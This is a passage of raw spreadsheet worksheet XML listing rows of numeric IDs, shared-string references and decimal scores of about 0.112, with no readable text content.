      </c>
      <c r="E24459" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24459" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="24460" ht="15.75" customHeight="1">
      <c r="A24460" s="1">
        <v>23741.0</v>
      </c>
      <c r="B24460" s="2">
        <v>7367232.0</v>
      </c>
      <c r="C24460" s="2" t="s">
        <v>23548</v>
      </c>
      <c r="D24460" s="2">
        <v>1.0</v>
      </c>
      <c r="E24460" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24460" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="24461" ht="15.75" customHeight="1">
      <c r="A24461" s="1">
        <v>27332.0</v>
      </c>
      <c r="B24461" s="2">
        <v>2.1451672E7</v>
      </c>
      <c r="C24461" s="2" t="s">
        <v>23549</v>
      </c>
      <c r="D24461" s="2">
        <v>1.0</v>
      </c>
      <c r="E24461" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24461" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="24462" ht="15.75" customHeight="1">
      <c r="A24462" s="1">
        <v>30574.0</v>
      </c>
      <c r="B24462" s="2">
        <v>4.1069306E7</v>
      </c>
      <c r="C24462" s="2" t="s">
        <v>23366</v>
      </c>
      <c r="D24462" s="2">
        <v>1.0</v>
      </c>
      <c r="E24462" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24462" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="24463" ht="15.75" customHeight="1">
      <c r="A24463" s="1">
        <v>30638.0</v>
      </c>
      <c r="B24463" s="2">
        <v>4.1581086E7</v>
      </c>
      <c r="C24463" s="2" t="s">
        <v>23550</v>
      </c>
      <c r="D24463" s="2">
        <v>1.0</v>
      </c>
      <c r="E24463" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24463" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="24464" ht="15.75" customHeight="1">
      <c r="A24464" s="1">
        <v>33221.0</v>
      </c>
      <c r="B24464" s="2">
        <v>7255674.0</v>
      </c>
      <c r="C24464" s="2" t="s">
        <v>23551</v>
      </c>
      <c r="D24464" s="2">
        <v>1.0</v>
      </c>
      <c r="E24464" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24464" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="24465" ht="15.75" customHeight="1">
      <c r="A24465" s="1">
        <v>553.0</v>
      </c>
      <c r="B24465" s="2">
        <v>1.8794344E7</v>
      </c>
      <c r="C24465" s="2" t="s">
        <v>23552</v>
      </c>
      <c r="D24465" s="2">
        <v>1.0</v>
      </c>
      <c r="E24465" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24465" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24466" ht="15.75" customHeight="1">
      <c r="A24466" s="1">
        <v>3197.0</v>
      </c>
      <c r="B24466" s="2">
        <v>3.7231665E7</v>
      </c>
      <c r="C24466" s="2" t="s">
        <v>23553</v>
      </c>
      <c r="D24466" s="2">
        <v>1.0</v>
      </c>
      <c r="E24466" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24466" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24467" ht="15.75" customHeight="1">
      <c r="A24467" s="1">
        <v>15916.0</v>
      </c>
      <c r="B24467" s="2">
        <v>4.4658159E7</v>
      </c>
      <c r="C24467" s="2" t="s">
        <v>23554</v>
      </c>
      <c r="D24467" s="2">
        <v>1.0</v>
      </c>
      <c r="E24467" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24467" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24468" ht="15.75" customHeight="1">
      <c r="A24468" s="1">
        <v>16914.0</v>
      </c>
      <c r="B24468" s="2">
        <v>4.812912E7</v>
      </c>
      <c r="C24468" s="2" t="s">
        <v>23555</v>
      </c>
      <c r="D24468" s="2">
        <v>1.0</v>
      </c>
      <c r="E24468" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24468" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24469" ht="15.75" customHeight="1">
      <c r="A24469" s="1">
        <v>17451.0</v>
      </c>
      <c r="B24469" s="2">
        <v>4.9809297E7</v>
      </c>
      <c r="C24469" s="2" t="s">
        <v>23556</v>
      </c>
      <c r="D24469" s="2">
        <v>1.0</v>
      </c>
      <c r="E24469" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24469" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24470" ht="15.75" customHeight="1">
      <c r="A24470" s="1">
        <v>21062.0</v>
      </c>
      <c r="B24470" s="2">
        <v>1.7803592E7</v>
      </c>
      <c r="C24470" s="2" t="s">
        <v>23481</v>
      </c>
      <c r="D24470" s="2">
        <v>1.0</v>
      </c>
      <c r="E24470" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24470" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24471" ht="15.75" customHeight="1">
      <c r="A24471" s="1">
        <v>21445.0</v>
      </c>
      <c r="B24471" s="2">
        <v>2.2403636E7</v>
      </c>
      <c r="C24471" s="2" t="s">
        <v>23485</v>
      </c>
      <c r="D24471" s="2">
        <v>1.0</v>
      </c>
      <c r="E24471" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24471" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24472" ht="15.75" customHeight="1">
      <c r="A24472" s="1">
        <v>21932.0</v>
      </c>
      <c r="B24472" s="2">
        <v>2.860126E7</v>
      </c>
      <c r="C24472" s="2" t="s">
        <v>23557</v>
      </c>
      <c r="D24472" s="2">
        <v>1.0</v>
      </c>
      <c r="E24472" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24472" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24473" ht="15.75" customHeight="1">
      <c r="A24473" s="1">
        <v>23102.0</v>
      </c>
      <c r="B24473" s="2">
        <v>5.0903671E7</v>
      </c>
      <c r="C24473" s="2" t="s">
        <v>23558</v>
      </c>
      <c r="D24473" s="2">
        <v>1.0</v>
      </c>
      <c r="E24473" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24473" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24474" ht="15.75" customHeight="1">
      <c r="A24474" s="1">
        <v>24850.0</v>
      </c>
      <c r="B24474" s="2">
        <v>1.2199268E7</v>
      </c>
      <c r="C24474" s="2" t="s">
        <v>23559</v>
      </c>
      <c r="D24474" s="2">
        <v>1.0</v>
      </c>
      <c r="E24474" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24474" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24475" ht="15.75" customHeight="1">
      <c r="A24475" s="1">
        <v>25110.0</v>
      </c>
      <c r="B24475" s="2">
        <v>1.2965435E7</v>
      </c>
      <c r="C24475" s="2" t="s">
        <v>23560</v>
      </c>
      <c r="D24475" s="2">
        <v>1.0</v>
      </c>
      <c r="E24475" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24475" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24476" ht="15.75" customHeight="1">
      <c r="A24476" s="1">
        <v>25242.0</v>
      </c>
      <c r="B24476" s="2">
        <v>1.3380153E7</v>
      </c>
      <c r="C24476" s="2" t="s">
        <v>23561</v>
      </c>
      <c r="D24476" s="2">
        <v>1.0</v>
      </c>
      <c r="E24476" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24476" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24477" ht="15.75" customHeight="1">
      <c r="A24477" s="1">
        <v>27706.0</v>
      </c>
      <c r="B24477" s="2">
        <v>2.3043535E7</v>
      </c>
      <c r="C24477" s="2" t="s">
        <v>23562</v>
      </c>
      <c r="D24477" s="2">
        <v>1.0</v>
      </c>
      <c r="E24477" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24477" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24478" ht="15.75" customHeight="1">
      <c r="A24478" s="1">
        <v>31179.0</v>
      </c>
      <c r="B24478" s="2">
        <v>4913043.0</v>
      </c>
      <c r="C24478" s="2" t="s">
        <v>23563</v>
      </c>
      <c r="D24478" s="2">
        <v>1.0</v>
      </c>
      <c r="E24478" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24478" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24479" ht="15.75" customHeight="1">
      <c r="A24479" s="1">
        <v>32092.0</v>
      </c>
      <c r="B24479" s="2">
        <v>5399868.0</v>
      </c>
      <c r="C24479" s="2" t="s">
        <v>23564</v>
      </c>
      <c r="D24479" s="2">
        <v>1.0</v>
      </c>
      <c r="E24479" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24479" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24480" ht="15.75" customHeight="1">
      <c r="A24480" s="1">
        <v>32213.0</v>
      </c>
      <c r="B24480" s="2">
        <v>5484715.0</v>
      </c>
      <c r="C24480" s="2" t="s">
        <v>23474</v>
      </c>
      <c r="D24480" s="2">
        <v>1.0</v>
      </c>
      <c r="E24480" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24480" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24481" ht="15.75" customHeight="1">
      <c r="A24481" s="1">
        <v>32405.0</v>
      </c>
      <c r="B24481" s="2">
        <v>5.6327242E7</v>
      </c>
      <c r="C24481" s="2" t="s">
        <v>23565</v>
      </c>
      <c r="D24481" s="2">
        <v>1.0</v>
      </c>
      <c r="E24481" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24481" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24482" ht="15.75" customHeight="1">
      <c r="A24482" s="1">
        <v>33403.0</v>
      </c>
      <c r="B24482" s="2">
        <v>7713638.0</v>
      </c>
      <c r="C24482" s="2" t="s">
        <v>23566</v>
      </c>
      <c r="D24482" s="2">
        <v>1.0</v>
      </c>
      <c r="E24482" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24482" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="24483" ht="15.75" customHeight="1">
      <c r="A24483" s="1">
        <v>165.0</v>
      </c>
      <c r="B24483" s="2">
        <v>1.375984E7</v>
      </c>
      <c r="C24483" s="2" t="s">
        <v>23567</v>
      </c>
      <c r="D24483" s="2">
        <v>1.0</v>
      </c>
      <c r="E24483" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24483" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24484" ht="15.75" customHeight="1">
      <c r="A24484" s="1">
        <v>173.0</v>
      </c>
      <c r="B24484" s="2">
        <v>1.3965513E7</v>
      </c>
      <c r="C24484" s="2" t="s">
        <v>23568</v>
      </c>
      <c r="D24484" s="2">
        <v>1.0</v>
      </c>
      <c r="E24484" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24484" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24485" ht="15.75" customHeight="1">
      <c r="A24485" s="1">
        <v>322.0</v>
      </c>
      <c r="B24485" s="2">
        <v>1.5714531E7</v>
      </c>
      <c r="C24485" s="2" t="s">
        <v>23569</v>
      </c>
      <c r="D24485" s="2">
        <v>1.0</v>
      </c>
      <c r="E24485" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24485" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24486" ht="15.75" customHeight="1">
      <c r="A24486" s="1">
        <v>810.0</v>
      </c>
      <c r="B24486" s="2">
        <v>2.1356531E7</v>
      </c>
      <c r="C24486" s="2" t="s">
        <v>23570</v>
      </c>
      <c r="D24486" s="2">
        <v>1.0</v>
      </c>
      <c r="E24486" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24486" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24487" ht="15.75" customHeight="1">
      <c r="A24487" s="1">
        <v>972.0</v>
      </c>
      <c r="B24487" s="2">
        <v>2.2755882E7</v>
      </c>
      <c r="C24487" s="2" t="s">
        <v>23571</v>
      </c>
      <c r="D24487" s="2">
        <v>1.0</v>
      </c>
      <c r="E24487" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24487" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24488" ht="15.75" customHeight="1">
      <c r="A24488" s="1">
        <v>2204.0</v>
      </c>
      <c r="B24488" s="2">
        <v>3.2049379E7</v>
      </c>
      <c r="C24488" s="2" t="s">
        <v>23572</v>
      </c>
      <c r="D24488" s="2">
        <v>1.0</v>
      </c>
      <c r="E24488" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24488" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24489" ht="15.75" customHeight="1">
      <c r="A24489" s="1">
        <v>3491.0</v>
      </c>
      <c r="B24489" s="2">
        <v>3.8466153E7</v>
      </c>
      <c r="C24489" s="2" t="s">
        <v>23573</v>
      </c>
      <c r="D24489" s="2">
        <v>1.0</v>
      </c>
      <c r="E24489" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24489" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24490" ht="15.75" customHeight="1">
      <c r="A24490" s="1">
        <v>5890.0</v>
      </c>
      <c r="B24490" s="2">
        <v>4.709338E7</v>
      </c>
      <c r="C24490" s="2" t="s">
        <v>23574</v>
      </c>
      <c r="D24490" s="2">
        <v>1.0</v>
      </c>
      <c r="E24490" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24490" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24491" ht="15.75" customHeight="1">
      <c r="A24491" s="1">
        <v>6209.0</v>
      </c>
      <c r="B24491" s="2">
        <v>4.7982393E7</v>
      </c>
      <c r="C24491" s="2" t="s">
        <v>23575</v>
      </c>
      <c r="D24491" s="2">
        <v>1.0</v>
      </c>
      <c r="E24491" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24491" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24492" ht="15.75" customHeight="1">
      <c r="A24492" s="1">
        <v>6926.0</v>
      </c>
      <c r="B24492" s="2">
        <v>4.9874904E7</v>
      </c>
      <c r="C24492" s="2" t="s">
        <v>23576</v>
      </c>
      <c r="D24492" s="2">
        <v>1.0</v>
      </c>
      <c r="E24492" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24492" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24493" ht="15.75" customHeight="1">
      <c r="A24493" s="1">
        <v>7600.0</v>
      </c>
      <c r="B24493" s="2">
        <v>5.1632224E7</v>
      </c>
      <c r="C24493" s="2" t="s">
        <v>23577</v>
      </c>
      <c r="D24493" s="2">
        <v>1.0</v>
      </c>
      <c r="E24493" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24493" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24494" ht="15.75" customHeight="1">
      <c r="A24494" s="1">
        <v>7709.0</v>
      </c>
      <c r="B24494" s="2">
        <v>5.1996937E7</v>
      </c>
      <c r="C24494" s="2" t="s">
        <v>23578</v>
      </c>
      <c r="D24494" s="2">
        <v>1.0</v>
      </c>
      <c r="E24494" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24494" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24495" ht="15.75" customHeight="1">
      <c r="A24495" s="1">
        <v>7834.0</v>
      </c>
      <c r="B24495" s="2">
        <v>5.2322113E7</v>
      </c>
      <c r="C24495" s="2" t="s">
        <v>23579</v>
      </c>
      <c r="D24495" s="2">
        <v>1.0</v>
      </c>
      <c r="E24495" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24495" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24496" ht="15.75" customHeight="1">
      <c r="A24496" s="1">
        <v>8919.0</v>
      </c>
      <c r="B24496" s="2">
        <v>5.4820798E7</v>
      </c>
      <c r="C24496" s="2" t="s">
        <v>23580</v>
      </c>
      <c r="D24496" s="2">
        <v>1.0</v>
      </c>
      <c r="E24496" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24496" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24497" ht="15.75" customHeight="1">
      <c r="A24497" s="1">
        <v>10554.0</v>
      </c>
      <c r="B24497" s="2">
        <v>1.2677226E7</v>
      </c>
      <c r="C24497" s="2" t="s">
        <v>23581</v>
      </c>
      <c r="D24497" s="2">
        <v>1.0</v>
      </c>
      <c r="E24497" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24497" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24498" ht="15.75" customHeight="1">
      <c r="A24498" s="1">
        <v>10877.0</v>
      </c>
      <c r="B24498" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C24498" s="2" t="s">
        <v>23582</v>
      </c>
      <c r="D24498" s="2">
        <v>1.0</v>
      </c>
      <c r="E24498" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24498" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24499" ht="15.75" customHeight="1">
      <c r="A24499" s="1">
        <v>11386.0</v>
      </c>
      <c r="B24499" s="2">
        <v>2.1505275E7</v>
      </c>
      <c r="C24499" s="2" t="s">
        <v>23583</v>
      </c>
      <c r="D24499" s="2">
        <v>1.0</v>
      </c>
      <c r="E24499" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24499" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24500" ht="15.75" customHeight="1">
      <c r="A24500" s="1">
        <v>12298.0</v>
      </c>
      <c r="B24500" s="2">
        <v>2.8294628E7</v>
      </c>
      <c r="C24500" s="2" t="s">
        <v>23584</v>
      </c>
      <c r="D24500" s="2">
        <v>1.0</v>
      </c>
      <c r="E24500" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24500" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24501" ht="15.75" customHeight="1">
      <c r="A24501" s="1">
        <v>13968.0</v>
      </c>
      <c r="B24501" s="2">
        <v>3.731463E7</v>
      </c>
      <c r="C24501" s="2" t="s">
        <v>23585</v>
      </c>
      <c r="D24501" s="2">
        <v>1.0</v>
      </c>
      <c r="E24501" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24501" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24502" ht="15.75" customHeight="1">
      <c r="A24502" s="1">
        <v>14132.0</v>
      </c>
      <c r="B24502" s="2">
        <v>3.7898733E7</v>
      </c>
      <c r="C24502" s="2" t="s">
        <v>23586</v>
      </c>
      <c r="D24502" s="2">
        <v>1.0</v>
      </c>
      <c r="E24502" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24502" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24503" ht="15.75" customHeight="1">
      <c r="A24503" s="1">
        <v>14947.0</v>
      </c>
      <c r="B24503" s="2">
        <v>4.1281008E7</v>
      </c>
      <c r="C24503" s="2" t="s">
        <v>23587</v>
      </c>
      <c r="D24503" s="2">
        <v>1.0</v>
      </c>
      <c r="E24503" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24503" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24504" ht="15.75" customHeight="1">
      <c r="A24504" s="1">
        <v>15100.0</v>
      </c>
      <c r="B24504" s="2">
        <v>4.1802443E7</v>
      </c>
      <c r="C24504" s="2" t="s">
        <v>23588</v>
      </c>
      <c r="D24504" s="2">
        <v>1.0</v>
      </c>
      <c r="E24504" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24504" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24505" ht="15.75" customHeight="1">
      <c r="A24505" s="1">
        <v>15131.0</v>
      </c>
      <c r="B24505" s="2">
        <v>4.1896815E7</v>
      </c>
      <c r="C24505" s="2" t="s">
        <v>23589</v>
      </c>
      <c r="D24505" s="2">
        <v>1.0</v>
      </c>
      <c r="E24505" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24505" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24506" ht="15.75" customHeight="1">
      <c r="A24506" s="1">
        <v>15214.0</v>
      </c>
      <c r="B24506" s="2">
        <v>4.2145884E7</v>
      </c>
      <c r="C24506" s="2" t="s">
        <v>23590</v>
      </c>
      <c r="D24506" s="2">
        <v>1.0</v>
      </c>
      <c r="E24506" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24506" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24507" ht="15.75" customHeight="1">
      <c r="A24507" s="1">
        <v>16803.0</v>
      </c>
      <c r="B24507" s="2">
        <v>4.7783556E7</v>
      </c>
      <c r="C24507" s="2" t="s">
        <v>23591</v>
      </c>
      <c r="D24507" s="2">
        <v>1.0</v>
      </c>
      <c r="E24507" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24507" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24508" ht="15.75" customHeight="1">
      <c r="A24508" s="1">
        <v>16815.0</v>
      </c>
      <c r="B24508" s="2">
        <v>4.7825333E7</v>
      </c>
      <c r="C24508" s="2" t="s">
        <v>23592</v>
      </c>
      <c r="D24508" s="2">
        <v>1.0</v>
      </c>
      <c r="E24508" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24508" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24509" ht="15.75" customHeight="1">
      <c r="A24509" s="1">
        <v>16998.0</v>
      </c>
      <c r="B24509" s="2">
        <v>4.8395748E7</v>
      </c>
      <c r="C24509" s="2" t="s">
        <v>23593</v>
      </c>
      <c r="D24509" s="2">
        <v>1.0</v>
      </c>
      <c r="E24509" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24509" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24510" ht="15.75" customHeight="1">
      <c r="A24510" s="1">
        <v>17789.0</v>
      </c>
      <c r="B24510" s="2">
        <v>5.0793473E7</v>
      </c>
      <c r="C24510" s="2" t="s">
        <v>23594</v>
      </c>
      <c r="D24510" s="2">
        <v>1.0</v>
      </c>
      <c r="E24510" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24510" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24511" ht="15.75" customHeight="1">
      <c r="A24511" s="1">
        <v>17829.0</v>
      </c>
      <c r="B24511" s="2">
        <v>5.0921976E7</v>
      </c>
      <c r="C24511" s="2" t="s">
        <v>23595</v>
      </c>
      <c r="D24511" s="2">
        <v>1.0</v>
      </c>
      <c r="E24511" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24511" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24512" ht="15.75" customHeight="1">
      <c r="A24512" s="1">
        <v>18761.0</v>
      </c>
      <c r="B24512" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C24512" s="2" t="s">
        <v>23596</v>
      </c>
      <c r="D24512" s="2">
        <v>1.0</v>
      </c>
      <c r="E24512" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24512" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24513" ht="15.75" customHeight="1">
      <c r="A24513" s="1">
        <v>19152.0</v>
      </c>
      <c r="B24513" s="2">
        <v>5.4868621E7</v>
      </c>
      <c r="C24513" s="2" t="s">
        <v>23597</v>
      </c>
      <c r="D24513" s="2">
        <v>1.0</v>
      </c>
      <c r="E24513" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24513" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24514" ht="15.75" customHeight="1">
      <c r="A24514" s="1">
        <v>19844.0</v>
      </c>
      <c r="B24514" s="2">
        <v>5.7086198E7</v>
      </c>
      <c r="C24514" s="2" t="s">
        <v>23598</v>
      </c>
      <c r="D24514" s="2">
        <v>1.0</v>
      </c>
      <c r="E24514" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24514" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24515" ht="15.75" customHeight="1">
      <c r="A24515" s="1">
        <v>20189.0</v>
      </c>
      <c r="B24515" s="2">
        <v>1.0504777E7</v>
      </c>
      <c r="C24515" s="2" t="s">
        <v>23599</v>
      </c>
      <c r="D24515" s="2">
        <v>1.0</v>
      </c>
      <c r="E24515" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24515" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24516" ht="15.75" customHeight="1">
      <c r="A24516" s="1">
        <v>20295.0</v>
      </c>
      <c r="B24516" s="2">
        <v>1.1291048E7</v>
      </c>
      <c r="C24516" s="2" t="s">
        <v>23600</v>
      </c>
      <c r="D24516" s="2">
        <v>1.0</v>
      </c>
      <c r="E24516" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24516" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24517" ht="15.75" customHeight="1">
      <c r="A24517" s="1">
        <v>20527.0</v>
      </c>
      <c r="B24517" s="2">
        <v>1.3171979E7</v>
      </c>
      <c r="C24517" s="2" t="s">
        <v>23601</v>
      </c>
      <c r="D24517" s="2">
        <v>1.0</v>
      </c>
      <c r="E24517" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24517" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24518" ht="15.75" customHeight="1">
      <c r="A24518" s="1">
        <v>20805.0</v>
      </c>
      <c r="B24518" s="2">
        <v>1.5292335E7</v>
      </c>
      <c r="C24518" s="2" t="s">
        <v>23602</v>
      </c>
      <c r="D24518" s="2">
        <v>1.0</v>
      </c>
      <c r="E24518" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24518" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24519" ht="15.75" customHeight="1">
      <c r="A24519" s="1">
        <v>20910.0</v>
      </c>
      <c r="B24519" s="2">
        <v>1.6294706E7</v>
      </c>
      <c r="C24519" s="2" t="s">
        <v>23603</v>
      </c>
      <c r="D24519" s="2">
        <v>1.0</v>
      </c>
      <c r="E24519" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24519" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24520" ht="15.75" customHeight="1">
      <c r="A24520" s="1">
        <v>21128.0</v>
      </c>
      <c r="B24520" s="2">
        <v>1.8373382E7</v>
      </c>
      <c r="C24520" s="2" t="s">
        <v>23604</v>
      </c>
      <c r="D24520" s="2">
        <v>1.0</v>
      </c>
      <c r="E24520" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24520" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24521" ht="15.75" customHeight="1">
      <c r="A24521" s="1">
        <v>21188.0</v>
      </c>
      <c r="B24521" s="2">
        <v>1.9260606E7</v>
      </c>
      <c r="C24521" s="2" t="s">
        <v>23605</v>
      </c>
      <c r="D24521" s="2">
        <v>1.0</v>
      </c>
      <c r="E24521" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24521" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24522" ht="15.75" customHeight="1">
      <c r="A24522" s="1">
        <v>21358.0</v>
      </c>
      <c r="B24522" s="2">
        <v>2.1378204E7</v>
      </c>
      <c r="C24522" s="2" t="s">
        <v>23606</v>
      </c>
      <c r="D24522" s="2">
        <v>1.0</v>
      </c>
      <c r="E24522" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24522" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24523" ht="15.75" customHeight="1">
      <c r="A24523" s="1">
        <v>21460.0</v>
      </c>
      <c r="B24523" s="2">
        <v>2.2694483E7</v>
      </c>
      <c r="C24523" s="2" t="s">
        <v>23607</v>
      </c>
      <c r="D24523" s="2">
        <v>1.0</v>
      </c>
      <c r="E24523" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24523" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24524" ht="15.75" customHeight="1">
      <c r="A24524" s="1">
        <v>21636.0</v>
      </c>
      <c r="B24524" s="2">
        <v>2.4690795E7</v>
      </c>
      <c r="C24524" s="2" t="s">
        <v>23608</v>
      </c>
      <c r="D24524" s="2">
        <v>1.0</v>
      </c>
      <c r="E24524" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24524" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24525" ht="15.75" customHeight="1">
      <c r="A24525" s="1">
        <v>21736.0</v>
      </c>
      <c r="B24525" s="2">
        <v>2.5847115E7</v>
      </c>
      <c r="C24525" s="2" t="s">
        <v>23609</v>
      </c>
      <c r="D24525" s="2">
        <v>1.0</v>
      </c>
      <c r="E24525" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24525" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="24526" ht="15.75" customHeight="1">
      <c r="A24526" s="1">
        <v>22085.0</v>
      </c>
      <c r="B24526" s="2">
        <v>3.0731442E7</v>
      </c>
      <c r="C24526" s="2" t="s">
        <v>23610</v>
      </c>
      <c r="D24526" s="2">
        <v>1.0</v>
      </c>
